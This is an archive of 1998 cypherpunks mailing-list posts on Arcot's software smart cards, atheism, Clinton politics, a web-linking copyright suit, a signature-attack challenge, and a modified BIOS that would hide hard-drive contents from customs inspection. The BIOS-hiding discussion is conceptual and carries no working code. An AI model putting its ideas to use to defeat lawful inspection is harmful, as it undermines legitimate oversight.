> Cc: cryptography@c2.net; libtech@lists.best.com
> Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
>
>
>
> I have consulted at both DigiCash and Arcot.  I am still
> under nondisclosure to Arcot, so I can't answer any
> questions about this that go beyond the publicly available
> information.  Arcot has recently made available on their public
> web site "Software Smart Cards via Cryptographc Camouflage", at
> http://www.arcot.com/camo2.html.  At the end of
> this paper is referenced Rivest's "Chaffing and Winnowing"
> paper.  These give a good overview of how such a technology
> can work, and the scope of its application.
>
>
> Nick Szabo
> szabo@best.com
> http://www.best.com/~szabo/
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kurt Buff" <kurtbuff@halcyon.com>
Date: Mon, 21 Sep 1998 23:13:15 +0800
To: <cypherpunks@toad.com>
Subject: RE: atheism (was: RE: Democracy... (fwd)) (fwd)
In-Reply-To: <Pine.BSF.3.96.980921142713.397R-100000@hun.org>
Message-ID: <000201bde5dd$7af6f520$1b01010a@boar.minuteman.org>
MIME-Version: 1.0
Content-Type: text/plain



Kropotkin said, long ago, something on the order of: "If there were a God,
we should assasinate him." That is what I would call a strong atheist
statement.

I (as a militant atheist) merely say that if you can define your God, I can
probably prove he doesn't exist. Unless, of course, your definition is so
broad as to have no meaning in the first place.

| -----BEGIN PGP SIGNED MESSAGE-----
| Hash: SHA1
|
| On Sun, 20 Sep 1998, Jim Choate wrote:
|
| >Forwarded message:
| >
| >> From: pjm@spe.com
| >> Date: Sun, 20 Sep 1998 20:13:38 +0200
| >> Subject: atheism (was: RE: Democracy... (fwd)) (fwd)
| >>
|    [snip]
|
| >No, atheism is the statement that "God could exist, but
| doesn't". Whether
| >one chooses to hang 'Bhuddism' or 'Wiccan' on is irrelevant.
| We aren't
| >discussion labels but rather characteristics. Fundamentaly
| *ALL* atheism
| >states:
| >
| >While it could happen that way, I don't believe it does.
| >
| >Which is identical in meaning to:
| >
| >While it could happen that way, I believe it doesn't.
| >
| >>      Getting back to the strong v. weak distinction, the
| weak atheist
| >> position that one "does not believe god(s) exist" does not
| constitute
| >> a belief, a set of beliefs, or a personal philosophy, let alone a
| >> religion.  The strong atheist position that one "believes god(s) do
| >> not exist" is actually making a knowledge claim and so
| does constitute
| >> a belief.
| >
| >Try to sell that spin-doctor bullshit to somebody else, and
| read a book on
| >basic logic.
| >
|     agreed, the strong v. weak atheist argument is _impossible_.
|
|     however, an interesting premise I posited to my 14 year old son
|     who had gone through his scientific awareness state and
|     consequently declared himself an "aethist". at the time he was in
|     a boarding school and we were in conversation with the chief
|     counselor who happened to be a member of an LDS bishopric:
|
|       kid:	  yes, an aethist.
|
|       father:	  so... you "deny" God's existence since their is no
|       		  "proof" of His existence. did you
| ever consider that in
|       		  order to "deny" anything, you must
| have defined that
|       		  concept?  in other words, to deny
| God, you must have
|       		  determined that I or someone else has
| defined God in
|       		  order for you to be able to "deny" God?
|       ...
|       counselor:  is there a difference between belief and faith?
|
|       ...
|       father:	  aethism is a concept which is almost impossible to
|       		  define as it is a denial that if it
| could it doesnt.
|       		  it is much easier to defend
| "agnosticism" where you
|       		  admit you do not believe, or have
| faith, because you
|       		  lack sufficient scientific proof.
| aethism is not
|      		  doubting, it is denying, even in the face of proof.
|
|       		  consider this in terms of both belief
| and faith:
|
| 		  suppose you die, and despite your lack of belief or
| 		  faith, you find yourself before the throne of God.
|
| 		  as your awareness returns, you look up and the image
| 		  of God is the image of an orangutan --now what are
| 		  you going to do?
|
|     without missing a heartbeat:
|
|       counselor:  I think you better get down on your knees and pray!
|
|     I seriously thought I would face an LDS disciplinary council for
|     that spontaneous off-the-wall comment. I didn't, but I have rocked
|     more than a few boats. and, it does point out the extent to which
|     belief is based on faith. to the literalists who point to Genesis
|     and "God created man in his own image" I always suggest that God
|     in the process could have refined homo sapiens over the years and
|     the original creation may have been significantly more endowed
|     with hair; secondly, God can appear to man in any form He chooses:
|     the burning bush, the blinding light to Saul, etc.
|
|     however, stating beliefs and disbeliefs is fine; trying
| to convince
|     another whose beliefs or disbeliefs are securely anchored
| in whatever
|     they believe as truth, is futile. I will accept, without trying to
|     change, anyone's "religious" beliefs as their beliefs; I only ask
|     they extend the same tolerance to me.
|
| 	attila out...
|
| >
|     [snip]
|
| -----BEGIN PGP SIGNATURE-----
| Version: PGPfreeware 5.0i for non-commercial use
| Comment: No safety this side of the grave. Never was; never will be.
| Charset: noconv
|
| iQA/AwUBNgZuCj7vNMDa3ztrEQLR7gCg7cqx1bA29pe+fBCb7DcyPundpGsAn39U
| hhEHvCh4fgriwDbOO/QbTdn3
| =gsVI
| -----END PGP SIGNATURE-----
|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 21 Sep 1998 21:13:39 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Stego-empty hard drives... (fwd)
Message-ID: <199809220241.VAA20426@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: 22 Sep 1998 02:15:42 -0000
> From: Anonymous <nobody@remailer.ch>
> Subject: Re: Stego-empty hard drives... (fwd)

> > How do you propose to do this? Via a BIOS setting?
> 
> By default. The machine boots. It is either told to accept a passphrase or
> is told nothing. If the latter, it boots normally, only with its HD-hiding
> code. If the former, it prompts, accepts a passphrase, and then boots
> normally, only with the HD-hiding code disabled.

Understood.

> What I think you're asking is how the actual cryptography would be done. I

That aspect is trivial from the mod-the-BIOS perspective, let's assume for a
moment that the crypto is in the ROM-burner...

Specificaly I am asking:

Given a BIOS which has been modified to allow the end-user to select between
encrypted and non-encrypted operation, how is the end-user supposed to
make this selection?

So far I've seen two suggestions:

1.	The BIOS is only 'sensitive' at particular points in the POST.

2.	The BIOS has a user-accessible selection via some method to
	activate their selection.

Both are workable, I'm looking for a more specific description of the
methods.

In the case of 1., is the marker going to be particular windows which are
bounded by particular messages printed to the boot console? In the case of
2. is it going to be a particular 'magic keystroke' that enables some hidden
option screen?

It seems to me that both have obvious methods of attack if the only goal is
to demonstrate to a legal standard that such capability exists.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Fred C. Moulton" <moulton@moulton.com>
Date: Tue, 22 Sep 1998 00:12:15 +0800
To: cypherpunks@cyberpass.net
Subject: Re: atheism (was: RE: Democracy... (fwd)) (fwd)
Message-ID: <2.2.32.19980922051555.00e2e634@shell7.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



In a recent message Jim Choate wrote:

>However, yourself, pjm, & Mr. Smith are claiming that a belief that
>something doesn't exist isn't a belief is simply a tricky play on semantics.
>A belief in a negative is still a belief irrespective of how many people
>believe it. Might doesn't make right (or logical).

Mr. Choate please spend as much time working on reading comprehension
as you do on logic.  If you read my message you will see that I have
not stated my view on the proper definition of atheism, I have not aligned
myself with pjm or George Smith nor have I aligned myself against them.  I
did provide two quotations from scholarly sources that used definitions
similar to that provided by pjm.  I also provided a quotation that there
several definitions of the term in usage and the various definitions each have
their supporters and their opponents.  My point was the definition I quoted
are well established in the scholarly literature and demonstrate that pjm was
not trying to introduce some new and unusual definition into the discussion.

Also based on the portion of your message I quote above, it appears that
you might have misunderstood the quotation I included from Mr. Smith's book.  I
am sorry that both space and copyright issues do not allow the entire book
to be sent to you, but I do suggest that you read the entire discussion
in the book if you are having difficulty with the short passage quoted
previously.

Regards

Fred






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Tue, 22 Sep 1998 00:35:25 +0800
To: Nick Szabo <szabo@best.com>
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <199809220131.SAA11293@shell7.ba.best.com>
Message-ID: <Pine.BSF.4.02.9809212206150.11625-100000@ideath.parrhesia.com>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 21 Sep 1998, Nick Szabo wrote:

> I have consulted at both DigiCash and Arcot.  I am still
> under nondisclosure to Arcot, so I can't answer any
> questions about this that go beyond the publicly available 
> information.  Arcot has recently made available on their public 
> web site "Software Smart Cards via Cryptographc Camouflage", at 
> http://www.arcot.com/camo2.html.  At the end of
> this paper is referenced Rivest's "Chaffing and Winnowing"
> paper.  These give a good overview of how such a technology
> can work, and the scope of its application.

I'm certainly not a cryptographer, but I'm somewhat at a loss in trying to
understand the purpose of using public-key (or asymmetric key)
cryptography within a policy/technology system which won't allow the use
of the strengths of asymmetric key crypto. As I understand the paper you
reference above, to implement this system the public key must be kept
confidential, and signed documents must also be kept confidential, or the
system of the security as a whole is at risk. With those constraints, why
bother with the overhead (computationally/technically/legally) of
asymmetric key crypto at all? 

It seems like much of the security in the system described above comes
from the server/other party's ability to thwart brute-force attacks by
detecting and responding to multiple failed attempts at authentication;
that seems like a very good thing, but not really a strength or a weakness
of the protocol itself, but an additional practice/protocol which is
useful in many contexts.

Is it really necessary/useful to call the scheme "software smart cards"?
If it were called "An improved system for user authentication", I don't
think it would make people nearly so suspicious. From my perspective, one
of the advantages of smart card technology is that I can carry my
authentication material with me; a system which puts it on my hard disk is
less attractive. Floppies are portable, but not durable. 

I didn't understand the relationship between this scheme and Rivest's
chaffing and winnowing which you note was cited as a reference in the SSC
paper - would you (or someone else) mind explaining the connection? The
closest I can get is thinking that there's a parallel between trying to
guess which PIN in the SSC system is valid and which isn't, and the
"winnowing" part of the Rivest protocol; but that doesn't seem like an
especially meaningful or illuminating relationship. It looks like maybe a
footnote was dropped, which would've tied the Rivest paper to a particular
passage in the paper.

--
Greg Broiles
gbroiles@netbox.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <jvb@ssds.com>
Date: Mon, 21 Sep 1998 22:55:08 +0800
To: Michael Motyka <mmotyka@lsil.com>
Subject: Re: Clinton's fake apologies (fwd)
In-Reply-To: <360683E5.26C6@lsil.com>
Message-ID: <Pine.LNX.3.96.980921221300.793A-100000@jb3.fastrans.net>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 21 Sep 1998, Michael Motyka wrote:

> Reeza! wrote:
> > In case you hadn't noticed, the investigation of him, vis-a-vis the rules
> > established by other demicans, his supposed compatriates, is still ongoing.
> > 
> > Methinks this is just the tip of the iceberg, a bone for the populace to
> > chew on so that when the rest of the story breaks, we (the dog) won't
> > notice the prime rib and sirloin.
> > 
> Completely illogical. Give me one good reason not to lead with your best
> punch? I suspect Starr's work is voluminous but weak on all other counts
> so he led with what would create the most publicity. I've said that I'm
> no great fan of Clinton's but this entire investigation is blatantly
> partisan and has brought the political process in this country about as
> low as it is possible to bring it. 
> 

Actually he was directed to present evidence of impeachable offenses
as soon as he found them.  Well he thinks he has found some and I
might concurr on a few.

Blatantly partisan impeachment hearings?  Say it aint so, Joe!

If you think the political process has never been lower then you
need to recheck the history of the last several years.  How about
Democrats and Republicans joining hand in hand to cheer on
the baby burning BATF in Waco?  Is your religion ATF approved?

How about murdering innocent mothers while they are holding
their babies in their arms?  A scene worthy of Hollywood 
depictions of WWII era Nazi's.  Sure, Weaver got his money,
but was anyone punished?  Will the money bring back his
family?

These cowards in Congress didn't have the balls to punish these
murderers then and they certainly don't seem to have changed
their tune.

When someone else had the cajones to try one of these bastards
on the soft charge of manslaughter the feds showed their true
colors and usurped jurisdiction and found them innocent under
color of law...

I seem to remember something about that by Tom Jefferson in the
Declaration of Independence:

"...For quatering large bodies of troops among us:
    For protecting them, by a mock trial, from punishment for
    any murders which they should commit on the inhabitants of
    these States"

That pretty much clinches it.  Yes, the political process
has been lower.  Unpunished baby burners, free roaming mother
murderers.  All performed by the Hostage Rescue Team with loving
grace.

Love is Hate.

Peace is War.

I love Big Brother.

I realize that now.

jb









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lazlo Toth <lazlototh@hempseed.com>
Date: Mon, 21 Sep 1998 23:12:36 +0800
To: Jim Choate <cypherpunks@toad.com
Subject: Re: Stego-empty hard drives... (fwd)
In-Reply-To: <199809220116.UAA20070@einstein.ssz.com>
Message-ID: <v04011702b22ccae60d28@[207.22.4.119]>
MIME-Version: 1.0
Content-Type: text/plain



On or about 8:16 PM -0500 9/21/98, Jim Choate wrote:
>Forwarded message:
>
>> Date: Tue, 22 Sep 1998 00:46:03 +0000
>> From: Michael Hohensee <mah248@is9.nyu.edu>
>> Subject: Re: Stego-empty hard drives... (fwd)
>
>> I believe that the idea was to set it up so that BIOS defaults to
>> HD-hiding mode.
>
>How do you propose to do this? Via a BIOS setting?

Yes.

>> When you're taking your laptop through customs, you do
>> nothing while the machine boots up, the doctored BIOS does its thing,
>> and everybody's happy.  When you want to get at the stuff on the rest of
>> the HD, you reboot and type in your passphrase.
>
>How do you propose to prompt the user for the correct time to type?

Pressing an obscure key combination during bootup to trigger the password
prompt should do the trick.

-Lazlo




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lazlo Toth <lazlototh@hempseed.com>
Date: Mon, 21 Sep 1998 23:12:37 +0800
To: cypherpunks@toad.com
Subject: Suit Claims Web Linking a Violation
Message-ID: <v04011700b22cc538b77f@[199.125.99.77]>
MIME-Version: 1.0
Content-Type: text/plain



Mr. Bernstein's own site (http://www.garybernstein.com/) has, as far as I
can tell, absolutely no external links.  I don't know whether this is a
recent modification in order not to undermine his case or it simply
reflects Mr. Bernstein's view of how the web should be.

It's hard to imagine him winning the case.  (God help him if he does;
that's a lot of angry netizens.)

>From ABC News:
>http://www.abcnews.com/sections/tech/DailyNews/websuit980921.html
>
>     San Francisco Examiner
>     Scripps Howard News Service
>
>     Copyright in Online Mediium
>     Suit Claims Web Linking a Violation
>     Sept. 21
>     In a lawsuit that experts say threatens the freewheeling nature of the
>World Wide Web, a photographer claims JC Penney Inc. should be held liable
>because its Web site was one of three "links" that ultimately led to an
>unauthorized display of his photo of movie star Elizabeth Taylor.
>     Celebrity photographer Gary Bernstein's complaint contends the
>department store, which advertises Taylor's "Passion" perfume on its Web
>site, violated his copyright even though its own site did not show his
>photograph.
>     The suit appears to be the first to claim a copyright violation
>resulted from multiple linking, the main way of moving about the World Wide
>Web. A hearing on whether the suit should proceed past the initial phase is
>set for today before U.S. District Judge Manuel Real in Los Angeles.
>....
>     According to the suit, JC Penney and Elizabeth Arden Co., the maker of
>Passion, in November1997 promoted the perfume with an online chat on
>America Online with Taylor, the perfume's spokeswoman.
>     Permission Not Granted
>     The chat site was linked to an Elizabeth Taylor Passion perfume page
>at a separate Web site run by JC Penney. On this page, viewers could click
>on a biography link that took them to another Web site run by Internet
>Movie Database Ltd., which featured information on the movie star.
>     Once there, they could click on another link that took them to a Web
>site run by the Swedish University Network, which included two photos of
>Taylor that had been taken by Bernstein. One-the "Pink Lady"-showed Taylor
>in a pink outfit. Another-"the lavender image"-showed her in a floral print
>dress.
>     Bernstein filed suit in April, claiming that he licensed the Pink Lady
>to Elizabeth Arden Co. to promote the perfume for a limited period that
>expired several years ago. The lavender image appeared on the cover of a
>photography magazine in 1986 and also was copyrighted, he said.
>     The suit said JC Penney, Arden and Internet Movie Database all
>violated Bernstein's copyright because-through the links-they reproduced or
>distributed the images on the Internet without his permission.
>     Weed Out Infringing Material
>     Moreover, anyone in the United States who found the photos through JC
>Penney's Web site and downloaded them also infringed on the copyright, it
>said.
>....
>Copyright 1998 Scripps Howard News Service. All rights reserved. This
>material may not be published, broadcast, rewritten, or redistributed."
>
>Entire article at:
>http://www.abcnews.com/sections/tech/DailyNews/websuit980921.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Colin Plumb <colin@nyx.net>
Date: Tue, 22 Sep 1998 00:51:17 +0800
To: doug@arcot.com
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
Message-ID: <199809220552.XAA17972@nyx10.nyx.net>
MIME-Version: 1.0
Content-Type: text/plain



Doug, I'd just like to thank you for replying.  Even without looking at your
description, the fact that you are willing to talk to doubters and admit
the limitations of your technique make me a lot more comfortable believing
that you have something.  You don't fit into either of the two standard
types of snake-oil salesmen: The "I can't tell you because it's secret"
sort, and the "it's totally unbreakable, cures world hunger and
disposes of nuclear waste" sort.

Not that people still don't wonder, but I thought I'd temper the technical
grilling I see heating up with some appreciation for the fact that you've
already managed a better impression than 95% of the crypto wannabes
out there.
-- 
	-Colin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 21 Sep 1998 23:38:01 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: atheism (was: RE: Democracy... (fwd)) (fwd)
Message-ID: <199809220506.AAA00515@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: "Kurt Buff" <kurtbuff@halcyon.com>
> Subject: RE: atheism (was: RE: Democracy... (fwd)) (fwd)
> Date: Mon, 21 Sep 1998 21:00:03 -0700

> I (as a militant atheist) merely say that if you can define your God, I can
> probably prove he doesn't exist. Unless, of course, your definition is so
> broad as to have no meaning in the first place.

Ok, I'll take you up on it.

Pantheism - the belief that everything is divine,
            that God is not seperate but totaly
            identified with the cosmos, and that
            God does not possess personality or
            transcendence.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 22 Sep 1998 02:07:21 +0800
To: Tim May <cypherpunks@cyberpass.net
Subject: Re: Have a cigar
In-Reply-To: <199809212002.QAA03936@mail1.panix.com>
Message-ID: <3.0.5.32.19980922000743.008ef300@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 07:57 PM 9/21/98 -0700, Tim May wrote:
>The paralysis of the U.S. government is heartwarming. No talk about sending
>troops to Kosovo, no plans to give the IMF more money to send to Russian
>and Wall Street mafiosos (mafiosi?), no talk of sending life preservers to

That just means they'll do all those things quietly, without
trying to take credit for it in public :-)

Or alternatively, they'll try to do it as a 
"Let's get back to business!  See, the Imperial Office Of The Presidency 
is too important to damage it through impeachment just because
of a little lying about sex, which Clinton was doing before you elected him,
so now that you've all had your fun, there's Important Work To Do!"
which is a nice thing to do after summer vacation anyway,
while all the Congresscritters are away from DC running for re-election.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 21 Sep 1998 23:49:08 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Stego-empty hard drives... (fwd)
Message-ID: <199809220517.AAA00628@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 21 Sep 1998 23:37:06 -0400
> From: Lazlo Toth <lazlototh@hempseed.com>
> Subject: Re: Stego-empty hard drives... (fwd)

> >How do you propose to prompt the user for the correct time to type?
> 
> Pressing an obscure key combination during bootup to trigger the password
> prompt should do the trick.

And just exactly how do you propose to spread this technology commercialy
without alerting at least some members of the constabulary of its existance?

Now if we are looking for a spin-loop in a POST that isn't there in a normal
BIOS then I would say simply use sig-analysis on the machine during POST.

You've got two options on labeling the BIOS. Either pick a ID that isn't a
legitimate BIOS id or else scam a legitimate version number. In either case
the police will have listings of the legitimate BIOS versions from the
maker.

The actual sig-analysis could probably be done with a standard AM radio as a
technology demonstration. Since a spin-loop in the POST is going to sound
much more consistent than the memory checks and hardware inits that take place.

Now on a commercial basis what I'd do is get the BIOS manufacturers to sell
me a copy of each of their legitimate BIOS'es and then create a library of
signal envelopes (similar to the library of ship sounds subs carry) and it
would be a trivial feat to build a detector that does a diff on the signal.
If it doesn't match they yank you out of line and ask you some tough
questions while a guy with some hardware savy, a BIOS listing, and a logic
analyzer builds a case against you.

No, I suspect you'll pull this off a few times and then they'll catch on,
assuming the NSA or DIA doesn't give them a jump start. My guess is they
already know how to do this sort of stuff and considering the budget being
spent on neutron scanners, gas sniffers, etc. the lifetime for this
technology won't be very long.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 21 Sep 1998 23:55:02 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Stego-empty hard drives... (fwd)
Message-ID: <199809220523.AAA00693@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: 22 Sep 1998 03:11:01 -0000
> From: Anonymous <nobody@remailer.ch>
> Subject: Re: Stego-empty hard drives... (fwd)

> There's a third option, but it may be a bit more difficult (or not). I'm
> not really a hardware person, and it's probably obvious.
> 
> 3.	Use a "crypto-dongle" similar to what someone here (Mr. Geiger, I
> 	believe) has come up with. You plug it into the parallel port or
> 	somewhere else, and the encrypted data is useless once the dongle 
> 	is removed. I would think that if we plugged this into the bus we
> 	could have the BIOS remap the IDE routines to some EPROM in that
> 	dongle. The cryptography could take place there too. If the spooks
> 	are on to you, you trash the dongle.

So you're proposal is not only to put the crypto in the BIOS but a set of
hardware device drivers to drive this port during boot but won't interfere
with regular OS device drivers?

> This paradigm breaks down when we get into the operating system, though. 
> Linux, for instance, apparently disposes of the BIOS and uses its own IDE
> driver. I assume that Windows 98 does the same thing. Linux is open
> source, so modifications could be made, but Windows would be harder. 

That was an additional issue that I was going to bring up.

I suspect that in both cases it would be feasible to do, though you'd need
to use a special driver in Linux type OS'es to shadow the BIOS driver back
into the memory map.

The real issue with me about this whole scheme is the distribution
mechanism. It is just too shakey and porous not to allow LEA's to know about
it. If they can get a copy themselves then they have a perfect mechanism to
build a virus-scanner style of program to look for the appropriate
footprint.



    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Hohensee <mah248@is9.nyu.edu>
Date: Mon, 21 Sep 1998 19:40:39 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com
Subject: Re: Stego-empty hard drives... (fwd)
In-Reply-To: <199809212323.SAA19241@einstein.ssz.com>
Message-ID: <3606F34B.90429FA1@is9.nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> 
> Forwarded message:
> 
> > Date: Mon, 21 Sep 1998 16:05:30 -0400
> > From: Sunder <sunder@brainlink.com>
> > Subject: Re: Stego-empty hard drives...
> 
> > What's this bullshit, eh?  Just overwrite the BIOS roms in your machine to
> > return all zeros for the sectors you don't want to show them.  Have some
> > special passphrase you have to type in while in the BIOS setup program to
> > deactivate this.  Most newer notebooks have flash upgradeable ROMs anyway.
> 
> What's this bullshit, eh?
> 
> I wonder how you propose to answer the question:
> 
> "Sir, exactly why are you typing that sentence into the computer at this
> time?"
> 
> Now we have not only given them probably cause but clear evidence for a
> prior intent to commit a crime. Even if your hard drive is clean they're
> going to bust your ass.
> 

I believe that the idea was to set it up so that BIOS defaults to
HD-hiding mode.  When you're taking your laptop through customs, you do
nothing while the machine boots up, the doctored BIOS does its thing,
and everybody's happy.  When you want to get at the stuff on the rest of
the HD, you reboot and type in your passphrase.

Presumably, one wouldn't do this in front of a customs official. :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Neels Kriek" <kriek@bigfoot.com>
Date: Tue, 22 Sep 1998 01:52:18 +0800
To: "Cypherpunks Distributed Remailer" <cypherpunks@einstein.ssz.com>
Subject: Re: Stego-empty hard drives... (fwd)
Message-ID: <009d01bde5f5$bd81f1c0$9d060cd1@alien>
MIME-Version: 1.0
Content-Type: text/plain



I have bee using Encrypted magic Folders for a while now.  it gives you the
option of encrypting all files in a specific folder. it can also do file
name scrambling and even hide all the files in a directory from the OS.

It activates through a hot key combination.  You work on the files you want
and when you exit emf the whole dir is hidden again.  probably not the most
secure system but it will certainly fool most them if you disable booting
from a stiffy/floppy.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@remailer.ch>
Date: Mon, 21 Sep 1998 21:08:56 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Stego-empty hard drives... (fwd)
Message-ID: <19980922021542.29546.qmail@hades.rpini.com>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 21 Sep 1998, Jim Choate wrote:

> 
> Forwarded message:
> 
> > Date: Tue, 22 Sep 1998 00:46:03 +0000
> > From: Michael Hohensee <mah248@is9.nyu.edu>
> > Subject: Re: Stego-empty hard drives... (fwd)
> 
> > I believe that the idea was to set it up so that BIOS defaults to
> > HD-hiding mode.
> 
> How do you propose to do this? Via a BIOS setting?

By default. The machine boots. It is either told to accept a passphrase or
is told nothing. If the latter, it boots normally, only with its HD-hiding
code. If the former, it prompts, accepts a passphrase, and then boots
normally, only with the HD-hiding code disabled.

What I think you're asking is how the actual cryptography would be done. I
wouldn't want to stick crypto code in the BIOS, or at least not the code
which will be used all the time. 

I think a better way to do this is to have the BIOS boot up in HD-hiding
mode all the time, and require user-mode software to disable HD-hiding
mode and then deal with the cryptography.

> 
> > When you're taking your laptop through customs, you do
> > nothing while the machine boots up, the doctored BIOS does its thing,
> > and everybody's happy.  When you want to get at the stuff on the rest of
> > the HD, you reboot and type in your passphrase.
> 
> How do you propose to prompt the user for the correct time to type?

You don't, at least not at first. If you hold down maybe the left and
right shift keys, in combination with the left alt key while pressing the
"R" key, it prompts "BIOS: ". You type your passphrase in. LILO (the LInux
LOader) does this if you depress a shift key during boot. Obviously with
LILO it's to specify kernel parameters, what OS to boot into, and things
like that.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 21 Sep 1998 20:05:35 +0800
To: cypherpunks@cyberpass.net
Subject: Re: CHALLENGE? Toto/signature attack w. unpublished public key
Message-ID: <199809220108.DAA07731@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



This value is wrong: it has 3 bytes of 0's inserted and is therefore
missing the last three bytes of the signature.

s =   0x08F4D5CBC10063725B206F787EB7370BBD0C5B4854CE79A9007D1801AEAEE6E6
        D2C68D7EDF877FECE1FA539D08BEC54BD152BA05113951E8A84CDECAD2CB8E7A
        C28BE916570BA7BB9C00C64DF57113C4AE81613BD351541523CD3A028FBF220E
        F7469BD4175302DCB5B6E886974877F28A2D301433AFFFE26081008BFF687B37


Here is the correct value, from the signed message.

08F4D5CBC10063725B206F787EB7370BBD0C5B4854CE79A97D1801AEAEE6E6D2
C68D7EDF877FECE1FA539D08BEC54BD152BA05113951E8A84CDECAD2CB8E7AC2
8BE916570BA7BB9CC64DF57113C4AE81613BD351541523CD3A028FBF220EF746
9BD4175302DCB5B6E886974877F28A2D301433AFFFE260818BFF687B37DE8167




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@remailer.ch>
Date: Mon, 21 Sep 1998 22:01:48 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Stego-empty hard drives... (fwd)
Message-ID: <19980922031101.30140.qmail@hades.rpini.com>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 21 Sep 1998, Jim Choate wrote:

> Specificaly I am asking:
> 
> Given a BIOS which has been modified to allow the end-user to select between
> encrypted and non-encrypted operation, how is the end-user supposed to
> make this selection?
> 
> So far I've seen two suggestions:
> 
> 1.	The BIOS is only 'sensitive' at particular points in the POST.
> 
> 2.	The BIOS has a user-accessible selection via some method to
> 	activate their selection.

There's a third option, but it may be a bit more difficult (or not). I'm
not really a hardware person, and it's probably obvious.

3.	Use a "crypto-dongle" similar to what someone here (Mr. Geiger, I
	believe) has come up with. You plug it into the parallel port or
	somewhere else, and the encrypted data is useless once the dongle 
	is removed. I would think that if we plugged this into the bus we
	could have the BIOS remap the IDE routines to some EPROM in that
	dongle. The cryptography could take place there too. If the spooks
	are on to you, you trash the dongle.

This paradigm breaks down when we get into the operating system, though. 
Linux, for instance, apparently disposes of the BIOS and uses its own IDE
driver. I assume that Windows 98 does the same thing. Linux is open
source, so modifications could be made, but Windows would be harder. 

Can someone more knowledgeable comment on this hardware dongle idea as
applied to this problem?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Mon, 21 Sep 1998 13:04:02 +0800
To: mmotyka@lsil.com
Subject: Re: Clinton's fake apologies (fwd)
In-Reply-To: <3.0.5.32.19980920152605.0086ba30@205.83.192.13>
Message-ID: <3.0.5.32.19980922040316.0081b9f0@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 09:50 AM 9/21/98 -0700, Michael Motyka wrote:
> 
